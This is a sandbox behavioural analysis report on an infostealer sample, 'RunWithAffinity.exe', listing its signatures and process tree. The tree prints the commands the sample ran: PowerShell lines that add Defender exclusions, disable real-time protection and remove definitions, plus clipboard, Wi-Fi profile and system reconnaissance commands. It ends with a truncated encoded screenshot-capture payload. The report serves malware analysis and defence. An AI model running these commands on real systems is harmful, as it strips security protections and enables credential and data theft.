Analysis
-
max time kernel
143s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2024 11:53
Behavioral task
behavioral1
Sample
RunWithAffinity.exe
Resource
win10v2004-20241007-en
General
-
Target
RunWithAffinity.exe
-
Size
7.5MB
-
MD5
6019d4756c3441d263122287dee5e1be
-
SHA1
6fba26be39d67fe7f49bb98bfdb9c260f683fb01
-
SHA256
eb9e6ee23bf224a25796c48ca84f35574f122afc95cb3b5681a39ee566e27571
-
SHA512
134f5edf81571099329880e7f4a898b140b935feebe6a4eb4c0bc3ea7ecfa25417721ecd7caa21d1c2bafd3a9992cc5b0fefbb1eaefa17a054fd3cafb0a5ea34
-
SSDEEP
196608:Tl0jj6fMWNteNTfm/pf+xk4dWRpmrbW3jmrJ:AmEWsy/pWu4kRpmrbmyrJ
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3260 powershell.exe 1732 powershell.exe 1008 powershell.exe 4140 powershell.exe 2920 powershell.exe 1660 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeRunWithAffinity.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RunWithAffinity.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 2 IoCs
Processes:
bound.exerar.exepid process 2144 bound.exe 312 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
RunWithAffinity.exepid process 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe 400 RunWithAffinity.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 24 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/memory/2144-338-0x0000000000400000-0x000000000057A000-memory.dmp autoit_exe behavioral1/memory/2144-366-0x0000000000400000-0x000000000057A000-memory.dmp autoit_exe behavioral1/memory/2144-369-0x0000000000400000-0x000000000057A000-memory.dmp autoit_exe behavioral1/memory/2144-371-0x0000000000400000-0x000000000057A000-memory.dmp autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 1460 tasklist.exe 1300 tasklist.exe 3976 tasklist.exe 4824 tasklist.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI22402\python311.dll upx behavioral1/memory/400-26-0x00007FFD407F0000-0x00007FFD40DD8000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\_ctypes.pyd upx behavioral1/memory/400-31-0x00007FFD549B0000-0x00007FFD549D4000-memory.dmp upx behavioral1/memory/400-50-0x00007FFD55B50000-0x00007FFD55B5F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI22402\libffi-8.dll upx behavioral1/memory/400-56-0x00007FFD50650000-0x00007FFD5067D000-memory.dmp upx behavioral1/memory/400-58-0x00007FFD50230000-0x00007FFD50249000-memory.dmp upx behavioral1/memory/400-60-0x00007FFD50200000-0x00007FFD50223000-memory.dmp upx behavioral1/memory/400-62-0x00007FFD4FB80000-0x00007FFD4FCF3000-memory.dmp upx behavioral1/memory/400-64-0x00007FFD50050000-0x00007FFD50069000-memory.dmp upx behavioral1/memory/400-66-0x00007FFD50CF0000-0x00007FFD50CFD000-memory.dmp upx behavioral1/memory/400-68-0x00007FFD4FFC0000-0x00007FFD4FFEE000-memory.dmp upx behavioral1/memory/400-73-0x00007FFD4FDC0000-0x00007FFD4FE78000-memory.dmp upx behavioral1/memory/400-72-0x00007FFD407F0000-0x00007FFD40DD8000-memory.dmp upx behavioral1/memory/400-76-0x00007FFD549B0000-0x00007FFD549D4000-memory.dmp upx behavioral1/memory/400-81-0x00007FFD50490000-0x00007FFD5049D000-memory.dmp upx behavioral1/memory/400-85-0x00007FFD4F870000-0x00007FFD4F98C000-memory.dmp upx behavioral1/memory/400-78-0x00007FFD4FFA0000-0x00007FFD4FFB4000-memory.dmp upx behavioral1/memory/400-75-0x00007FFD3FF80000-0x00007FFD402F5000-memory.dmp upx behavioral1/memory/400-105-0x00007FFD50200000-0x00007FFD50223000-memory.dmp upx behavioral1/memory/400-108-0x00007FFD4FB80000-0x00007FFD4FCF3000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\bound.exe upx behavioral1/memory/2144-109-0x0000000000400000-0x000000000057A000-memory.dmp upx behavioral1/memory/400-175-0x00007FFD50050000-0x00007FFD50069000-memory.dmp upx behavioral1/memory/400-264-0x00007FFD4FFC0000-0x00007FFD4FFEE000-memory.dmp upx behavioral1/memory/400-288-0x00007FFD4FDC0000-0x00007FFD4FE78000-memory.dmp upx behavioral1/memory/400-300-0x00007FFD3FF80000-0x00007FFD402F5000-memory.dmp upx behavioral1/memory/400-328-0x00007FFD4FB80000-0x00007FFD4FCF3000-memory.dmp upx behavioral1/memory/400-323-0x00007FFD549B0000-0x00007FFD549D4000-memory.dmp upx behavioral1/memory/400-322-0x00007FFD407F0000-0x00007FFD40DD8000-memory.dmp upx behavioral1/memory/2144-338-0x0000000000400000-0x000000000057A000-memory.dmp upx behavioral1/memory/400-339-0x00007FFD407F0000-0x00007FFD40DD8000-memory.dmp upx behavioral1/memory/400-359-0x00007FFD50200000-0x00007FFD50223000-memory.dmp upx behavioral1/memory/400-364-0x00007FFD4FDC0000-0x00007FFD4FE78000-memory.dmp upx behavioral1/memory/400-363-0x00007FFD4FFC0000-0x00007FFD4FFEE000-memory.dmp upx behavioral1/memory/400-362-0x00007FFD50CF0000-0x00007FFD50CFD000-memory.dmp upx behavioral1/memory/400-361-0x00007FFD50050000-0x00007FFD50069000-memory.dmp upx behavioral1/memory/400-360-0x00007FFD4FB80000-0x00007FFD4FCF3000-memory.dmp upx behavioral1/memory/400-358-0x00007FFD50230000-0x00007FFD50249000-memory.dmp upx behavioral1/memory/400-357-0x00007FFD50650000-0x00007FFD5067D000-memory.dmp upx behavioral1/memory/400-356-0x00007FFD55B50000-0x00007FFD55B5F000-memory.dmp upx behavioral1/memory/400-355-0x00007FFD549B0000-0x00007FFD549D4000-memory.dmp upx behavioral1/memory/400-354-0x00007FFD3FF80000-0x00007FFD402F5000-memory.dmp upx behavioral1/memory/400-353-0x00007FFD4F870000-0x00007FFD4F98C000-memory.dmp upx behavioral1/memory/400-352-0x00007FFD50490000-0x00007FFD5049D000-memory.dmp upx behavioral1/memory/400-351-0x00007FFD4FFA0000-0x00007FFD4FFB4000-memory.dmp upx behavioral1/memory/2144-366-0x0000000000400000-0x000000000057A000-memory.dmp upx behavioral1/memory/2144-369-0x0000000000400000-0x000000000057A000-memory.dmp upx behavioral1/memory/2144-371-0x0000000000400000-0x000000000057A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
bound.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
bound.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bound.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bound.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1732 powershell.exe 4140 powershell.exe 1732 powershell.exe 1732 powershell.exe 1008 powershell.exe 1008 powershell.exe 3260 powershell.exe 3260 powershell.exe 4140 powershell.exe 4140 powershell.exe 2152 powershell.exe 2152 powershell.exe 2152 powershell.exe 964 powershell.exe 964 powershell.exe 1008 powershell.exe 3260 powershell.exe 964 powershell.exe 2920 powershell.exe 2920 powershell.exe 3604 powershell.exe 3604 powershell.exe 1660 powershell.exe 1660 powershell.exe 3520 powershell.exe 3520 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
bound.exepid process 2144 bound.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exepowershell.exetasklist.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 4140 powershell.exe Token: SeDebugPrivilege 1300 tasklist.exe Token: SeDebugPrivilege 1460 tasklist.exe Token: SeDebugPrivilege 1008 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeIncreaseQuotaPrivilege 3624 WMIC.exe Token: SeSecurityPrivilege 3624 WMIC.exe Token: SeTakeOwnershipPrivilege 3624 WMIC.exe Token: SeLoadDriverPrivilege 3624 WMIC.exe Token: SeSystemProfilePrivilege 3624 WMIC.exe Token: SeSystemtimePrivilege 3624 WMIC.exe Token: SeProfSingleProcessPrivilege 3624 WMIC.exe Token: SeIncBasePriorityPrivilege 3624 WMIC.exe Token: SeCreatePagefilePrivilege 3624 WMIC.exe Token: SeBackupPrivilege 3624 WMIC.exe Token: SeRestorePrivilege 3624 WMIC.exe Token: SeShutdownPrivilege 3624 WMIC.exe Token: SeDebugPrivilege 3624 WMIC.exe Token: SeSystemEnvironmentPrivilege 3624 WMIC.exe Token: SeRemoteShutdownPrivilege 3624 WMIC.exe Token: SeUndockPrivilege 3624 WMIC.exe Token: SeManageVolumePrivilege 3624 WMIC.exe Token: 33 3624 WMIC.exe Token: 34 3624 WMIC.exe Token: 35 3624 WMIC.exe Token: 36 3624 WMIC.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeDebugPrivilege 3976 tasklist.exe Token: SeIncreaseQuotaPrivilege 3624 WMIC.exe Token: SeSecurityPrivilege 3624 WMIC.exe Token: SeTakeOwnershipPrivilege 3624 WMIC.exe Token: SeLoadDriverPrivilege 3624 WMIC.exe Token: SeSystemProfilePrivilege 3624 WMIC.exe Token: SeSystemtimePrivilege 3624 WMIC.exe Token: SeProfSingleProcessPrivilege 3624 WMIC.exe Token: SeIncBasePriorityPrivilege 3624 WMIC.exe Token: SeCreatePagefilePrivilege 3624 WMIC.exe Token: SeBackupPrivilege 3624 WMIC.exe Token: SeRestorePrivilege 3624 WMIC.exe Token: SeShutdownPrivilege 3624 WMIC.exe Token: SeDebugPrivilege 3624 WMIC.exe Token: SeSystemEnvironmentPrivilege 3624 WMIC.exe Token: SeRemoteShutdownPrivilege 3624 WMIC.exe Token: SeUndockPrivilege 3624 WMIC.exe Token: SeManageVolumePrivilege 3624 WMIC.exe Token: 33 3624 WMIC.exe Token: 34 3624 WMIC.exe Token: 35 3624 WMIC.exe Token: 36 3624 WMIC.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 4824 tasklist.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 3604 powershell.exe Token: SeIncreaseQuotaPrivilege 1108 WMIC.exe Token: SeSecurityPrivilege 1108 WMIC.exe Token: SeTakeOwnershipPrivilege 1108 WMIC.exe Token: SeLoadDriverPrivilege 1108 WMIC.exe Token: SeSystemProfilePrivilege 1108 WMIC.exe Token: SeSystemtimePrivilege 1108 WMIC.exe Token: SeProfSingleProcessPrivilege 1108 WMIC.exe Token: SeIncBasePriorityPrivilege 1108 WMIC.exe Token: SeCreatePagefilePrivilege 1108 WMIC.exe Token: SeBackupPrivilege 1108 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
bound.exepid process 2144 bound.exe 2144 bound.exe 2144 bound.exe 2144 bound.exe 2144 bound.exe 2144 bound.exe -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
bound.exepid process 2144 bound.exe 2144 bound.exe 2144 bound.exe 2144 bound.exe 2144 bound.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
RunWithAffinity.exeRunWithAffinity.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2240 wrote to memory of 400 2240 RunWithAffinity.exe RunWithAffinity.exe PID 2240 wrote to memory of 400 2240 RunWithAffinity.exe RunWithAffinity.exe PID 400 wrote to memory of 2696 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 2696 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 536 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 536 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 844 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 844 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 3752 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 3752 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 1552 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 1552 400 RunWithAffinity.exe cmd.exe PID 2696 wrote to memory of 1732 2696 cmd.exe powershell.exe PID 2696 wrote to memory of 1732 2696 cmd.exe powershell.exe PID 400 wrote to memory of 4940 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 4940 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 1872 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 1872 400 RunWithAffinity.exe cmd.exe PID 536 wrote to memory of 4140 536 cmd.exe powershell.exe PID 536 wrote to memory of 4140 536 cmd.exe powershell.exe PID 4940 wrote to memory of 1460 4940 cmd.exe tasklist.exe PID 4940 wrote to memory of 1460 4940 cmd.exe tasklist.exe PID 1872 wrote to memory of 1300 1872 cmd.exe tasklist.exe PID 1872 wrote to memory of 1300 1872 cmd.exe tasklist.exe PID 400 wrote to memory of 832 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 832 400 RunWithAffinity.exe cmd.exe PID 844 wrote to memory of 1008 844 cmd.exe powershell.exe PID 844 wrote to memory of 1008 844 cmd.exe powershell.exe PID 400 wrote to memory of 5000 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 5000 400 RunWithAffinity.exe cmd.exe PID 3752 wrote to memory of 2144 3752 cmd.exe bound.exe PID 3752 wrote to memory of 2144 3752 cmd.exe bound.exe PID 3752 wrote to memory of 2144 3752 cmd.exe bound.exe PID 1552 wrote to memory of 3260 1552 cmd.exe powershell.exe PID 1552 wrote to memory of 3260 1552 cmd.exe powershell.exe PID 400 wrote to memory of 3956 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 3956 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 1400 400 RunWithAffinity.exe wmiprvse.exe PID 400 wrote to memory of 1400 400 RunWithAffinity.exe wmiprvse.exe PID 400 wrote to memory of 3520 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 3520 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 2364 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 2364 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 1660 400 RunWithAffinity.exe Conhost.exe PID 400 wrote to memory of 1660 400 RunWithAffinity.exe Conhost.exe PID 400 wrote to memory of 2208 400 RunWithAffinity.exe cmd.exe PID 400 wrote to memory of 2208 400 RunWithAffinity.exe cmd.exe PID 832 wrote to memory of 3624 832 cmd.exe WMIC.exe PID 832 wrote to memory of 3624 832 cmd.exe WMIC.exe PID 5000 wrote to memory of 2152 5000 cmd.exe cmd.exe PID 5000 wrote to memory of 2152 5000 cmd.exe cmd.exe PID 3956 wrote to memory of 3976 3956 cmd.exe tasklist.exe PID 3956 wrote to memory of 3976 3956 cmd.exe tasklist.exe PID 1400 wrote to memory of 1356 1400 cmd.exe tree.com PID 1400 wrote to memory of 1356 1400 cmd.exe tree.com PID 2208 wrote to memory of 964 2208 cmd.exe powershell.exe PID 2208 wrote to memory of 964 2208 cmd.exe powershell.exe PID 2364 wrote to memory of 2572 2364 cmd.exe systeminfo.exe PID 2364 wrote to memory of 2572 2364 cmd.exe systeminfo.exe PID 3520 wrote to memory of 4668 3520 cmd.exe netsh.exe PID 3520 wrote to memory of 4668 3520 cmd.exe netsh.exe PID 1660 wrote to memory of 4192 1660 cmd.exe reg.exe PID 1660 wrote to memory of 4192 1660 cmd.exe reg.exe PID 400 wrote to memory of 1500 400 RunWithAffinity.exe cmd.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 1336 attrib.exe 1748 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\RunWithAffinity.exe"C:\Users\Admin\AppData\Local\Temp\RunWithAffinity.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Users\Admin\AppData\Local\Temp\RunWithAffinity.exe"C:\Users\Admin\AppData\Local\Temp\RunWithAffinity.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RunWithAffinity.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RunWithAffinity.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAo